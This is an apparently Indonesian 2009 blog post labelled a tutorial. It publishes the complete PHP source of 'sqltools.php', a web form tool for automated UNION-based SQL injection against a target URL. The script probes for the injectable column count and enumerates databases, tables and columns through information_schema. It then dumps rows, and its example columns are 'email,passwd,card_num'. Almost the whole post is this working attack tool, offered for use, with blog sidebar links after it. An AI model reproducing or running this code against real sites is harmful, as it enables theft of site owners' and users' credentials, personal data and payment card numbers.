Sourcode sqltools.php ~ matthews

code sql tools
<?
set_time_limit(0);
error_reporting(0);
$fungsi=strip_tags($_POST['fungsi']);
$url=strip_tags($_POST['url']);
$db=strip_tags($_POST['db']);
$table=strip_tags($_POST['table']);
$column=strip_tags($_POST['column']);
$start=strip_tags($_POST['start']);
$stop=strip_tags($_POST['stop']);
  $target=strip_tags($_POST['target']);
  ?>
  <title>.: SQL INJECTION TOOL BY ECEK2 & OON_BOY :.</title>
  <head>
  </head>
  <script>
  function show(id){
  document.getElementById(id).style.display="block";
  }
  function hide(id){
  document.getElementById(id).style.display="none";
  }
  function db(){show("db");hide("table");hide("column");hide("dump");hide("findcol");}
  function table(){hide("db");show("table");hide("column");hide("dump");hide("findcol");}
  function column(){hide("db");hide("table");show("column");hide("dump");hide("findcol");}
  function dump(){hide("db");hide("table");hide("column");show("dump");hide("findcol");}
  function findcol(){hide("db");hide("table");hide("column");hide("dump");show("findcol");}
  function help(){alert("This tool is for helping us playing with sql injection for php mysql site \n Please contact us when you find bug in this tool \n oon@oonboy.info");}
  </script>
  <style>
  #db,#table,#column,#dump,#findcol {display:none;}
  </style>
<a href="javascript:findcol();">FindCol</a> |
  <a href="javascript:db();">Database</a> |
  <a href="javascript:table();">Table</a> |
  <a href="javascript:column();">Column</a> |
  <a href="javascript:dump();">Dump</a> |
  <a href="javascript:help();">Help</a> |
  <b>Created by <a href=http://ecek2.dibatam.com>ecek2</a> & <a 
  href=http://oon.batamhacker.or.id>OoN_Boy</a></b>
  <p>

<div id=db>
  <form method=post>
  <input type=hidden name=fungsi value=db>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
  <tr><td><td><td><input type=submit value="Show Databases"></table>
  </form>
  </div>
<div id=table>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  <input type=hidden name=fungsi value=table>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>"><br>
  <tr><td>DB<td> : <td><input name=db value="<?=$db;?>"><br>

  <tr><td><td><td><input type=submit value="Show Table"></table>
  </form>
  </div>
<div id=column>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  <input type=hidden name=fungsi value=column>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
  <tr><td>DB<td> : <td><input name=db value="<?=$db;?>">
  <tr><td>Table<td> : <td><input name=table value="<?=$table;?>">
  <tr><td><td><td><input type=submit value="Show Column"></table>
  </form>
  </div>
<div id=dump>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  <input type=hidden name=fungsi value=dump>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
  <tr><td>DB<td> : <td><input name=db value="<?=$db;?>">
  <tr><td>Table<td> : <td><input name=table value="<?=$table;?>">
  <tr><td>Column<td> : <td><input name=column value="<?=$column;?>"> ex : email,passwd,card_num
  <tr><td>Start<td> : <td><input name=start value="<?=$start;?>"> **start from field number**
  <tr><td>Stop<td> : <td><input name=stop value="<?=$stop;?>"> **stop field number**
  <tr><td><td><td><input type=submit value="Dump"></table>
  </form>
  </div>
<div id=findcol>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  Target <input name=target size=100 value="<?=$target;?>"><input type=submit value=test>
  </form>
  </div>
<?
/* GET DATABASE NAME */
  if(isset($url) && $fungsi=="db"){
  $countdb="concat(0x6b30706c30,count(schema_name),0x6b30706c30)";
  $showdb="concat(0x6b30706c30,schema_name,0x6b30706c30)";
  $showdb2="+from+information_schema.schemata";
  $end="--";
  //print "$url <br>";
  $url_1=str_replace("k0pl0",$countdb,$url);
  $url_2=$url_1.$showdb2.$end;
  $url_3=str_replace("k0pl0",$showdb,$url);
  $data=file_get_contents($url_2);
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "$jumlah database<br>";
  for($i=0;$i<$jumlah;$i++){
  flush();
  $nomor=($i+1);
  $urlx=$url_3.$showdb2."+limit+$i,1".$end;
  $datax=file_get_contents($urlx);
  $namadatabase=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namadatabase <br>";
  flush();
  }
  }

/* GET TABLE NAME */
  if(isset($url) && $fungsi == "table"){
  $query="concat(0x6b30706c30,count(table_name),0x6b30706c30)";
  $next="+from+information_schema.tables";
  $query2="concat(0x6b30706c30,table_name,0x6b30706c30)";
  $end="--";
if(isset($db) && $db !==""){
  $next=$next."+where+table_schema=0x".bin2hex($db);
  }

$url_1=str_replace("k0pl0",$query,$url);
  $url_2=$url_1.$next.$end;
  $url_3=str_replace("k0pl0",$query2,$url);
  //echo "inject : $url_2";
  $data=file_get_contents($url_2);
  //echo $data;
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "<br>$jumlah tables<br>";
  for($i=0;$i<$jumlah;$i++){
  flush();
  $nomor=($i+1);
  $urlx=$url_3.$next."+limit+$i,1".$end;
  $datax=file_get_contents($urlx);
  $namatable=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namatable <br>";
  flush();
  }
  }
// GET COLUMN NAME LIST
  if(isset($url) && $url3 !== "" && isset($table) && $table !== "" && $fungsi == "column"){
  $query="concat(0x6b30706c30,count(column_name),0x6b30706c30)";
  $next="+from+information_schema.columns+where+table_name=0x".bin2hex($table);
  $query2="concat(0x6b30706c30,column_name,0x6b30706c30)";
  $end="--";
if(isset($db) && $db !==""){
  $next=$next."+and+table_schema=0x".bin2hex($db);
  }
$url_1=str_replace("k0pl0",$query,$url);
  $url_2=$url_1.$next.$end;
  $url_3=str_replace("k0pl0",$query2,$url);
  //echo "inject : $url_2";
  $data=file_get_contents($url_2);
  //echo $data;
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "<br>$jumlah Columns<br>";
  for($i=0;$i<$jumlah;$i++){
  flush();
  $nomor=($i+1);
  $urlx=$url_3.$next."+limit+$i,1".$end;
  //echo $urlx;
  $datax=file_get_contents($urlx);
  $namatable=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namatable <br>";
  flush();
  }
  }

// DUMB DATA
  if($fungsi=="dump" && isset($url) && $url !== "" && isset($table) && $table !== "" && isset($column) && $column !=="" ){
  $query="concat(0x6b30706c30,count(*),0x6b30706c30)";
  $next="+from+$table";
  $query2="concat(0x6b30706c30,concat_ws(0x203a20,".$column."),0x6b30706c30)";
  $end="--";
if(isset($db) && $db !==""){
  $next="+from+$db.$table";
  }
$url_1=str_replace("k0pl0",$query,$url);
  $url_2=$url_1.$next.$end;
  $url_3=str_replace("k0pl0",$query2,$url);
  //echo "inject : $url_2";
  $data=file_get_contents($url_2);
  //echo $data;
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "<br>$jumlah data<br>";
  for($i=$start;$i<=$stop;$i++){
  flush();
  $nomor=$i;
  $urlx=$url_3.$next."+limit+$i,1".$end;
  //echo $urlx;
  $datax=file_get_contents($urlx);
  $namatable=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namatable <br>";
  flush();
  }
  }
// GET MAGIC NUMBER
  if(isset($target) && $taget !== ""){
  echo "trying... 1 ";
  $targetx=$target."-1+union+select+0x6b30706c30";
  $targety=$target."-1+union+select+1";
  $injek="";
  $y="";
  $end="--";
  for($i=1;$i<100;$i++){
  flush();
  $y .= ",".($i+1);
  $oon=($i+1)."oon";
  $hexx=bin2hex($oon);
  $injek.=",0x6b30706c30".$hexx;
  $link=$targetx.$injek;
  $akhir = $link.$end;
  //echo $akhir;
  echo ($i+1)." ";
  $data=file_get_contents($akhir);
  if(eregi("k0pl0",$data)){
  $magicnumber=antara($data,"k0pl0","oon");
  $mbuh=",".$magicnumber.",";
  $zzz=str_replace($mbuh,",k0pl0,",$targety.$y);
  $linkinjek=$targety.$y.$end;
  echo "<br>VULNER : $zzz<br>Magic number= $magicnumber<br><a href=$linkinjek target=\"_blank\">$linkinjek</a><p><b>info</b><br>";
  $ambilinfo=str_replace("k0pl0","concat(0x6b30706c30,concat_ws(0x3c62723e,concat(0x64617461626173652076657273696f6e203a20,version()),concat(0x64617461626173652075736572203a20,user()),concat(0x6461746162617365206e616d65203a20,database())),0x6b30706c30)",$zzz).$end;
  $datainfo=file_get_contents($ambilinfo);
  $info=antara($datainfo,"k0pl0","k0pl0");
  echo $info;
  break;
  }
  if($i=="99"){echo "<br><font color=red><b>Maybe this site is not Vulner, or you can try to inject it manually :)<b></font>";}
  flush();
  }
}

 function antara($string, $start, $end){
  $string = " ".$string;
  $ini = strpos($string,$start);
  if ($ini == 0) return "";
  $ini += strlen($start);
  $len = strpos($string,$end,$ini) - $ini;
  return substr($string,$ini,$len);
 


Posted in:  tutorial
matthews

Saturday, September 12, 2009

Sourcode sqltools.php

Popular Posts

Link for education

About Me

Blog Archive

Categories

news from Kecoak Elektronik Indonesia

news from SecurityFocus Vulnerabilities

adsensecamp

adbrite2

News from milw0rm

Labels

Blog Archive

Blogger templates

Blogger news

Location

Blogroll
